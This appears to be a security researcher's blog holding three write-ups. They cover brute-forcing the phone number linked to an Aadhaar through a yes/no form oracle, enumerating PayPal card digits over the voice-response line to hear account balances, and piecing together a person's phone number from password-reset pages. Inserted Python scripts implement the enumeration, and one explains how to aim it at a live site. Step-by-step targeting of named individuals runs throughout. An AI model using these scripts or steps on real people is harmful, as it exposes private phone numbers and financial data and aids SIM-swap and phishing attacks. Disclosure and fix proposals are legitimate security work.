Extracting personal phone numbers linked to Aadhaar

Introduction

The purpose of this article is to demonstrate how the personal phone number linked to any given Aadhaar number can be recovered, owing to flaws in how some websites implement the SMS one-time-password (OTP) authentication flow that Aadhaar-based login relies on.

Websites which make use of text-based (OTP) Aadhaar authentication display to the user only the last four digits of the phone number linked to the provided Aadhaar. This is ostensibly a privacy safeguard put in place by the UIDAI to limit personally identifiable information from being revealed prior to authentication.

This privacy safeguard can be circumvented through websites which implement text-based Aadhaar authentication poorly; specifically, websites which ask the user to enter both the Aadhaar number and the phone number linked to it, and then check whether the two correspond before sending an OTP.

If the provided phone number does not match the phone number linked to the corresponding Aadhaar, the user is told so and may try again. The form therefore acts as a yes/no oracle: it confirms or denies any candidate phone number for a given Aadhaar.


This flaw in implementation introduces a surface for computer-aided guessing and enumeration attacks which can be abused to reveal the entire phone number linked to a given Aadhaar.

Several websites were analyzed and tested for this article out of which three were found to be vulnerable to enumeration attacks which could be used to retrieve the complete phone number linked to an Aadhaar.

Obtaining the last four digits

The digilocker.gov.in website reveals the last four digits of the linked phone number prior to successful authentication, so a user only has to enter an Aadhaar number when signing up for DigiLocker for those four digits to be displayed.

digilocker.gov.in

It should be clarified that DigiLocker is one of many websites which can be used to retrieve the last four digits of the Aadhaar-linked phone number. It should also be clarified that the websites mentioned in this post were selected for no reasons other than their general availability.

Another website which was found to share the characteristic of disclosing the last four digits was nfsm.gov.in – where after entering an Aadhaar number the last four digits of the phone number linked to it were displayed.

nfsm.gov.in

While most of the sites examined were found to implement text-based Aadhaar authentication properly, several others, in both the public and private sector, exhibited the implementation flaw described above.

Obtaining the first six digits

Under the Indian mobile numbering plan, a mobile number is ten digits long and its first digit can (at the time of writing) only be one of nine (9), eight (8) or seven (7).

This is immensely useful during enumeration, as every candidate beginning with 0 through 6 can be discarded outright: only three of the ten possible leading digits need to be tried.

Let us say that the following partial phone number is retrieved from DigiLocker or any other website which performs Aadhaar authentication:

Here, the digits which are not currently known are represented using X, and the digits which are known are represented using Y.

Purely as an optimisation, enumeration should begin with the 9XXX series, as it is the most populated mobile number series in India.

Discovery of the five unknown digits can be automated with a script, or through an intercepting proxy such as the OWASP Zed Attack Proxy (ZAP), whose fuzzer sends automated requests to a web server with a given set of payloads.

(In this context, the term payload refers to the entire five-digit number space, i.e. every value from 00000 to 99999.)

To reiterate; the script or tool would query any of the vulnerable websites repeatedly to extract the full phone number pertaining to any given Aadhaar.

The video below demonstrates this process through the use of Burp Suite – which is another intercepting proxy capable of sending automated requests.

In the video above, the valid phone number can be distinguished by its response length: a length of 8081 signifies a match, whereas 1389 or 1375 signifies an authentication failure. The exact lengths are specific to the site and request used in the demonstration; what matters is that a successful match produces a response that differs measurably from a failure.

If no valid results are found in the 9XXX series of phone numbers, enumeration could then be carried out on the 8XXX and 7XXX number series respectively – until a match has been found.

In most cases – a positive match should be found in the 9XXX series simply due to its size – but this ultimately depends on several factors such as the state where the phone number in question was issued, cellular carrier (as well as whether the number has been ported to another carrier) and others.

At 100 requests per second (6,000 per minute), exhausting the 100,000 possible combinations (00000 to 99999) in a single number series takes roughly 17 minutes. This assumes the site tolerates that request rate without throttling or locking the account.

This means that exhausting all three current number series (9XXX, 8XXX, 7XXX), 300,000 combinations in total, would take around 50 minutes under the above conditions.

NOTE: A text message containing a one-time password for Aadhaar authentication is sent to the linked phone number as soon as a match is found, so a successful guess is not silent: the owner of the number receives an OTP they did not request.
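The enumeration loop described above, written out as an added example in Python; this is not the author's script or the Burp/ZAP configuration from the video. The leading-digit series (9, 8, 7) and the response lengths (8081 for a match, 1389 for a failure) are taken from the article; the "vulnerable website" is a constructed stand-in oracle so the code runs offline, and the Aadhaar value is a placeholder. Against a real target the oracle would be an HTTP request whose response length is compared in the same way.

```python
"""
Added example (not the original author's tooling): enumerating the mobile
number linked to an Aadhaar, given its last four digits and a yes/no oracle
that is recognised purely by response length.
"""
from typing import Callable, Iterator, Optional, Tuple

# Leading digits of Indian mobile numbers as given in the article, most
# populated series first.
SERIES = ("9", "8", "7")

# Response lengths observed in the article's demonstration; these are specific
# to that site and must be re-measured for any other target.
MATCH_LENGTH = 8081
FAIL_LENGTH = 1389


def candidates(last_four: str, series: Tuple[str, ...] = SERIES) -> Iterator[str]:
    """Yield every ten-digit number consistent with a known last-four suffix.

    The first digit is taken from `series`; the five digits in between are the
    00000-99999 payload space, so each series contributes 100,000 candidates.
    """
    if len(last_four) != 4 or not last_four.isdigit():
        raise ValueError("last_four must be exactly four digits")
    for first in series:
        for middle in range(100_000):
            yield f"{first}{middle:05d}{last_four}"


def make_length_oracle(linked_number: str) -> Callable[[str, str], int]:
    """Constructed stand-in for the vulnerable form (not a real site).

    Returns the length of the hypothetical HTTP response: MATCH_LENGTH when
    the submitted phone number is the one linked to the Aadhaar, FAIL_LENGTH
    otherwise.
    """
    def oracle(aadhaar: str, phone: str) -> int:
        return MATCH_LENGTH if phone == linked_number else FAIL_LENGTH
    return oracle


def enumerate_phone(aadhaar: str, last_four: str,
                    oracle: Callable[[str, str], int],
                    match_length: int = MATCH_LENGTH) -> Tuple[Optional[str], int]:
    """Submit candidates until the response length signals a match.

    Returns (phone number or None, number of requests made).
    """
    requests = 0
    for phone in candidates(last_four):
        requests += 1
        if oracle(aadhaar, phone) == match_length:
            return phone, requests
    return None, requests


def eta_minutes(requests: int, rate_per_second: float = 100.0) -> float:
    """Wall-clock estimate at a sustained request rate (no throttling assumed)."""
    return requests / rate_per_second / 60.0


if __name__ == "__main__":
    # Constructed inputs: a placeholder Aadhaar and a made-up linked number.
    aadhaar = "000000000000"
    linked = "9876501234"
    found, n = enumerate_phone(aadhaar, "1234", make_length_oracle(linked))
    print(f"match {found} after {n} requests (~{eta_minutes(n):.1f} min at 100 req/s)")
    print(f"worst case, all three series: {eta_minutes(300_000):.0f} min")
```

The oracle is the only part that changes between the simulation and a live test: replace it with a function that submits the Aadhaar and candidate number to the form and returns `len(response.content)`, and the rest of the loop is unchanged. Keep in mind that every request is a login attempt against the target site, and the first hit triggers an OTP to the victim's phone.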

Possible fixes

The masking scheme used in the authentication process could be strengthened by disclosing only the least number of digits needed to verify the correctness of the linked phone number.

An example of such a masking scheme could be something similar to this:

A masked phone number like the one displayed above would hinder attempts at enumeration and/or guessing while still allowing for verification of the correctness of the linked phone number.

Conclusion

A new attack surface is introduced when websites which make use of Aadhaar authentication allow users to enter an Aadhaar number as well as the phone number linked to the same. Any website which shares this characteristic could potentially be abused in such a way which allows for accurate deduction of the phone number linked to a given Aadhaar.

The privacy implications of being able to map an Aadhaar number to its corresponding phone number are grave – as a lot can become known about a person given their phone number, such as their full name through a reverse lookup, their social media profiles through ‘Find your friends’ features on social media websites, and more information which one should not be able to glean from a 12 digit UID.

Additionally, knowledge of a phone number and the Aadhaar card number to which it is linked could be used by malicious parties to aid SIM swap attacks, phishing schemes and other illicit activities which require knowledge of the same.

PayPal: Disclosure of account balance and recent transactions

Introduction

This post details an issue which allows for enumeration of the last four digits of the payment method (such as a credit or debit card) linked to a PayPal account, and consequently for the disclosure of that account's balance and recent transactions.

This attack was submitted to PayPal’s bug bounty program where it was classified as being out of scope, which is something that would admittedly be unavailing to refute, since their program scope does not mention anything about attacks on their interactive voice response system.

The issue still exists as of February 24, 2018.

Prerequisites and Reconnaissance

In order to get started, the attacker would require knowledge of two pieces of information pertaining to an account, which would be the e-mail address and phone number linked to it.

Armed with knowledge of the e-mail address and phone number linked to an account, the attacker would visit the Forgot Password page on PayPal’s website, and enter the e-mail address associated with the targeted account.

The attacker would then be presented with the type of card linked to the account, as well as the last two digits of the same.

PayPal - Forgot Password

Attacking the Interactive Voice Response System

At first glance, the interactive voice response (IVR) system for PayPal's phone-based customer support appears to allow a maximum of three attempts at submitting the correct last four digits per phone call.

However, if the first attempt is incorrect, the caller is not notified of a successful submission on any subsequent attempt made during the same call. This makes the additional attempts offered during a call purely cosmetic.

To get around this, the attacker need only make a single attempt at submitting a candidate combination of the last four digits per phone call.

PayPal - Customer Support

Limiting attempts to one submission per phone call also makes enumeration more time-efficient, and it makes a correct attempt trivially distinguishable from an incorrect one.

Furthermore, having tested this theory with my own account, I have been able to conclude that there is no limit on the number of submission attempts which can be made in this manner, meaning that hypothetically, an attacker could even call 10,000 times to enumerate the last four digits entirely on their own.

That would, however, disregard the last two digits retrieved from the Forgot Password page, knowledge of which makes the attack far more feasible by reducing the number of possible combinations from 10,000 to just 100.

Once the correct combination of the last four digits has been found, the attacker would simply have to use the interactive voice response system to retrieve information about the account.

After the correct last four digits have been entered, the account's current balance is read out automatically by the machine.

Additionally, to retrieve information about recent transactions, an attacker would simply have to say “recent transactions”, and the same would then be read off.

Attack Efficacy and Efficiency

If the aforementioned prerequisites have been met, an attacker would reliably be able to enumerate the correct last four digits of the payment method linked to an account. This information could then be used to retrieve the account's current balance and recent transactions as well.

Moreover, after having timed various attempts at submission of the last four digits, it was found that an attempt at submission would on average take around 30 seconds. The fastest possible time was found to be exactly 27 seconds per phone call.

Taking the fastest observed time as the average, enumerating all possible combinations from 00XX to 99XX (100 calls at 27 seconds each) would take at most around 45 minutes. This time could be halved by making calls from a second phone in parallel.

Possible Fixes

Users should be allowed to opt for privacy settings which keep the amount of data revealed on the Forgot Password page to a minimum. This would be similar to how Twitter allows its users to hide information about the email address and/or phone number linked to their account when attempting to reset its password.

It would also be similar to how Facebook allows users to choose whether their full names show up or not when their e-mail address is entered on the password reset page.

Perhaps some measures could be deployed whereby the last two digits of the credit or debit card, if they need to be shown at all, are only shown when the request meets certain criteria, such as having been made from a recognised device or location.

Conclusion

This issue allows for enumeration of the last four digits of the payment method on an account, which then allows for the disclosure of the account’s current balance and recent transactions.

An attacker with knowledge of the targeted account’s email address and phone number would first use PayPal’s Forgot Password page to retrieve the last two digits of the payment method linked to the account.

The attacker would then be able to enumerate the last four digits of the payment method (or rather, the first two of those four, since the last two are already known) by making phone calls to PayPal's phone-based customer support and interacting with the interactive voice response system.

Once the attacker has successfully enumerated the last four digits of credit/debit card or bank account linked to the account, they would then be able to query the current account balance and recent transaction information at will.

I would like to mention that since there is no human interaction required or involved in this attack, it is essentially a backdoor into PayPal accounts–allowing attackers to query current account balance and recent transaction information of any given account, at any time.

Fuzzing for obfuscated phone numbers

Introduction

In the current age of information, any technology you own could potentially be used as an avenue for attack, including your mobile phone.

In writing and publishing this piece, I am hoping to highlight the risk of linking a single invariable phone number across all of your online accounts, and how doing so could easily allow for an adversary to derive your personal phone number, and then use it to carry out attacks which require knowledge of the same.

The potential threat posed by someone knowing your phone number might seem trivial at most, until the existence of vulnerabilities such as the one that recently affected T-Mobile is taken into account.

In the case of the previously mentioned vulnerability, an attacker could have used it to query sensitive, personally identifiable information of any T-Mobile subscriber by knowing just their phone number.

The data being leaked included the account number, status and creation date, SIM IMSI number, e-mail address, encrypted security question answers, and details of when the account password was last changed.

Furthermore, the accumulated information could then be used to aid what is called a ‘SIM swap’ attack, which allows attackers to gain access to and have complete control over a person’s mobile phone number, including all incoming and outgoing communication (calls, text messages and voicemail).

Reconnaissance

This post assumes a fictional target in the United States; based on context, the same approach can be adapted to persons in other countries.

The attacker would need to determine the location of the target from their online presence.

This part is extremely easy, as most people reveal their current city on their Facebook page. However, if this information is not listed on their social media profiles, it would have to be gathered from other publicly available sources. The attacker would also require knowledge of the target’s e-mail address.

Once the prerequisites have been met, the attacker would head over to the ‘Forgot password’ page on Facebook or Twitter, and submit the email address or username of the target.

If the submitted e-mail address or username corresponds to an existing account, the attacker would be presented with the last two digits of the phone number linked to it.

The attacker would then head over to PayPal’s website for more information regarding the phone number.

The process here is similar—the attacker would enter the e-mail address of the target on the ‘Having trouble logging in?’ page and use the response to add to the currently incomplete phone number.

A look at the target’s social media profiles allows for a conclusion to be made about their current city of residence, which in this case is: New York, USA.

The attacker then looks through the area codes assigned to the city and finds that only one of them starts with the digit ‘3’, which matches the first digit retrieved earlier from PayPal.

This information allows the attacker to confirm the first three digits of the phone number.

The attacker would now have to parse a list of all possible phone number prefixes (which would be the three digits following the area code) and adjoin them with the partially obfuscated phone number currently known.

Lastly, the attacker would have to manually submit and check off phone numbers from the compiled list, until either the full name of the target has been returned, or distinctive characteristics which are most likely to match the originally provided e-mail address have been identified.

It is possible to automate this part of the process, but it usually would not be needed as the list of possible phone numbers shouldn’t be too long to begin with.

Success! The previously obfuscated phone number is now fully known.
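The steps above (combine the fragments revealed by each reset page, pick the area code consistent with the known first digit, adjoin every 200-999 prefix, fill in whatever is still unknown) as an added Python example; it is not code from the original article. The fragments, the area code list for New York City and the conflict case are constructed for illustration, and the reset pages themselves are not queried: what this adds beyond the text is a consistency check that catches a stale number revealed by one site before any time is spent on candidates built from it.

```python
"""
Added example, not code from the original article: merging the partial phone
number fragments that password-reset pages reveal into one mask, checking them
for consistency, and expanding that mask into a candidate list using the
NPA-NXX-XXXX structure of North American numbers.
"""
import itertools
from typing import Iterable, List

UNKNOWN = "X"  # marks a digit the attacker does not yet know


def merge_masks(*masks: str) -> str:
    """Combine same-length masks digit by digit.

    A revealed digit fills an unknown position; two different revealed digits
    at the same position are a conflict (for example a stale number on one
    site) and raise ValueError rather than silently picking one.
    """
    if not masks:
        raise ValueError("at least one mask is required")
    length = len(masks[0])
    merged = [UNKNOWN] * length
    for mask in masks:
        if len(mask) != length:
            raise ValueError("masks must all have the same length")
        for pos, ch in enumerate(mask):
            if ch == UNKNOWN:
                continue
            if not ch.isdigit():
                raise ValueError(f"unexpected character {ch!r} at position {pos}")
            if merged[pos] not in (UNKNOWN, ch):
                raise ValueError(
                    f"conflict at position {pos}: {merged[pos]} vs {ch}")
            merged[pos] = ch
    return "".join(merged)


def _fits(mask: str, digits: str) -> bool:
    """True if every known digit in `mask` agrees with `digits`."""
    return all(m == UNKNOWN or m == d for m, d in zip(mask, digits))


def matching_area_codes(mask: str, area_codes: Iterable[str]) -> List[str]:
    """Area codes (the first three digits) consistent with the mask."""
    return [npa for npa in area_codes if _fits(mask[:3], npa)]


def expand(mask: str, area_codes: Iterable[str]) -> List[str]:
    """Expand a ten-digit mask into concrete numbers.

    Exchange prefixes (digits 4-6) run from 200 to 999, as the article states;
    any unknown subscriber digits (7-10) are filled with every combination.
    """
    if len(mask) != 10:
        raise ValueError("expected a ten-digit mask")
    tail = mask[6:]
    open_positions = [i for i, ch in enumerate(tail) if ch == UNKNOWN]
    numbers = []
    for npa in matching_area_codes(mask, area_codes):
        for nxx in range(200, 1000):
            head = f"{npa}{nxx:03d}"
            if not _fits(mask[:6], head):
                continue
            # product(..., repeat=0) yields one empty tuple, so a fully known
            # tail still produces exactly one number per prefix.
            for fill in itertools.product("0123456789", repeat=len(open_positions)):
                digits = list(tail)
                for i, d in zip(open_positions, fill):
                    digits[i] = d
                numbers.append(head + "".join(digits))
    return numbers


# Illustrative (constructed) area code list for New York City; check a current
# NANPA listing before relying on it.
NYC_AREA_CODES = ("212", "347", "646", "718", "917", "929")

if __name__ == "__main__":
    # Constructed fragments: Facebook shows the last two digits, PayPal the
    # first digit and the last four.
    facebook = "XXXXXXXX34"
    paypal = "3XXXXX1234"
    mask = merge_masks(facebook, paypal)
    print("merged mask:", mask)
    print("area codes:", matching_area_codes(mask, NYC_AREA_CODES))
    pool = expand(mask, NYC_AREA_CODES)
    print(len(pool), "candidates, e.g.", pool[0], "...", pool[-1])
```

With the first digit and last four known and a single matching area code, the pool is 800 numbers (one per 200-999 prefix), small enough to check by hand against the Facebook reset page as the article describes; if only the last two digits were known the same expansion would yield 800 numbers per area code times 100 subscriber fillings, which is where automation becomes necessary.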

It is also possible to further verify whether the retrieved phone number belongs to the target (or not), by using various open source intelligence techniques.

For instance, unless you have explicitly disabled a certain privacy setting on Facebook, your full name and profile picture are displayed to anyone who submits your e-mail address or phone number on the ‘Forgot password’ page.

Another technique is to use Google’s ‘Forgot email?’ page, which allows you to submit a name and phone number to see if there is a corresponding Google account linked with the same.

Conclusion

The attacker would initially use Twitter or Facebook to gather information about the target’s location and to retrieve the last two digits of the target’s phone number.

PayPal would then be used to retrieve the first digit and the last four digits of the phone number. The last four digits retrieved from PayPal also serve to verify that the last two digits retrieved from Facebook are accurate and up to date.

The target’s general location and the previously retrieved first digit would then be used to make an educated guess about the area code (first three digits) of the phone number in question.

The phone number prefixes (which are the three digits following the area code) would be parsed into a list of possible phone numbers belonging to the target, with number prefixes ranging from 200-999.

The exact phone number would then be confirmed by submitting phone numbers from the compiled list to the ‘Forgot password’ page on Facebook, and looking for when the full name of the target is returned, or when distinctive characteristics—such as an unusual e-mail address domain are found to match with the originally provided e-mail address.

The websites mentioned in this report play a pivotal part in allowing for the recovery of obfuscated phone numbers; however, it should be noted that they are only two of several popular websites which pave the way for the same end result.

For example, Yahoo! gives away the first and last two digits of the phone number when attempting to reset an account password.

The general public can combat part of the issue by using varying phone numbers when signing up for different online services, and by refraining from providing personal phone numbers to websites that reveal partial phone number information on their password reset pages.

Update: April 11, 2018 – An earlier version of this article appears in the Spring 2018 issue (Volume 35-1) of 2600 Magazine.

This article was originally published on June 29, 2017. It was then taken down and republished on January 11, 2018.